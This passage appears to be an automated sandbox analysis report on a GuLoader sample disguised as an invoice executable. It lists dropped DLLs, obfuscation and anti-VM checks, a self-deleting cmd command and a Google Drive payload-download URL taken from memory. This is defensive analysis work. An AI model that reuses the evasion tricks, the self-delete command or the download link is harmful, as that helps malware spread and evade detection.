Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.24.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.24.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862380174.000000006F6C9000.00000002.00020000.sdmp, mozglue.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.24.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.24.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.24.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.24.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.24.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.24.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.24.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.24.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.24.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.24.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.24.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.24.dr

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.541230200.00000000022F0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_00417BB0 push dword ptr [edi+000000BCh]; ret 0_2_004185BC
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_00406E76 push 31716A05h; retf 0_2_00406E7B
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_00405A07 push ebx; iretd 0_2_00405A09
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_00404430 pushfd ; retf 0_2_00404432
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_004064DA push esi; ret 0_2_004064E5
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_0040708F push ebx; iretd 0_2_00407091
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_004052A7 push ebx; iretd 0_2_004052A9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_00404F7C push es; iretd 0_2_00404F7D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_00405F08 push es; iretd 0_2_00405F09
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_0040392D push esi; ret 0_2_00403934
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_004063CF push ebx; iretd 0_2_004063D1
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_00406FD7 push ebx; iretd 0_2_00406FD9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_004039AE push ds; iretd 0_2_004039DF
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_004069B4 push es; iretd 0_2_004069B5
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FB86B push ebx; ret 0_2_022FB86D
PE file contains sections with non-standard names
Source: sqlite3.dll.24.dr Static PE information: section name: /4
Source: sqlite3.dll.24.dr Static PE information: section name: /19
Source: sqlite3.dll.24.dr Static PE information: section name: /31
Source: sqlite3.dll.24.dr Static PE information: section name: /45
Source: sqlite3.dll.24.dr Static PE information: section name: /57
Source: sqlite3.dll.24.dr Static PE information: section name: /70
Source: sqlite3.dll.24.dr Static PE information: section name: /81
Source: sqlite3.dll.24.dr Static PE information: section name: /92
Source: AccessibleHandler.dll.24.dr Static PE information: section name: .orpc
Source: AccessibleMarshal.dll.24.dr Static PE information: section name: .orpc
Source: IA2Marshal.dll.24.dr Static PE information: section name: .orpc
Source: lgpllibs.dll.24.dr Static PE information: section name: .rodata
Source: MapiProxy.dll.24.dr Static PE information: section name: .orpc
Source: MapiProxy_InUse.dll.24.dr Static PE information: section name: .orpc
Source: mozglue.dll.24.dr Static PE information: section name: .didat
Source: msvcp140.dll.24.dr Static PE information: section name: .didat
Binary contains a suspicious time stamp
Source: ucrtbase.dll.24.dr Static PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]
Source: initial sample Static PE information: section name: .text entropy: 7.12774451895

Persistence and Installation Behavior:

barindex
Creates processes with suspicious names
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: \usd15.030 payment copy & signed invoice september 2021 shipment.exe
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: \usd15.030 payment copy & signed invoice september 2021 shipment.exe
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: \usd15.030 payment copy & signed invoice september 2021 shipment.exe Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: \usd15.030 payment copy & signed invoice september 2021 shipment.exe Jump to behavior
Drops PE files
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\mozMapi32_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\MapiProxy_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\MapiProxy.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\libEGL.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\ldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\ldif60.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\qipcap.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\IA2Marshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\AccessibleMarshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\nssckbi.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\AccessibleHandler.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\breakpadinjector.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\mozMapi32.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\ucrtbase.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\lgpllibs.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\prldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Self deletion via cmd delete
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe'
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe' Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000000.00000002.541240943.0000000002310000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.858194273.0000000000780000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=10SMU8PGAZ7U1KQK-AKSIAM6PSN2MMSZ4WININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000000.00000002.541240943.0000000002310000.00000004.00000001.sdmp, usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.858194273.0000000000780000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe RDTSC instruction interceptor: First address: 00000000022F9DDA second address: 00000000022F9DDA instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, E2BA7CF5h 0x00000013 xor eax, DC8A25F1h 0x00000018 xor eax, 3427492Ch 0x0000001d xor eax, 0A171029h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007FF2103A1C18h 0x0000002e jmp 00007FF2103A12FEh 0x00000030 test ch, dh 0x00000032 popad 0x00000033 test esi, 513A66FCh 0x00000039 call 00007FF2103A14C6h 0x0000003e lfence 0x00000041 rdtsc
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe RDTSC instruction interceptor: First address: 0000000000569DDA second address: 0000000000569DDA instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, E2BA7CF5h 0x00000013 xor eax, DC8A25F1h 0x00000018 xor eax, 3427492Ch 0x0000001d xor eax, 0A171029h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007FF2103A1BC8h 0x0000002e jmp 00007FF2103A12AEh 0x00000030 test ch, dh 0x00000032 popad 0x00000033 test esi, 513A66FCh 0x00000039 call 00007FF2103A1476h 0x0000003e lfence 0x00000041 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\timeout.exe TID: 6980 Thread sleep count: 90 > 30 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\mozMapi32_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\MapiProxy_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\MapiProxy.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\libEGL.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\ldap60.dll Jump to dropped file
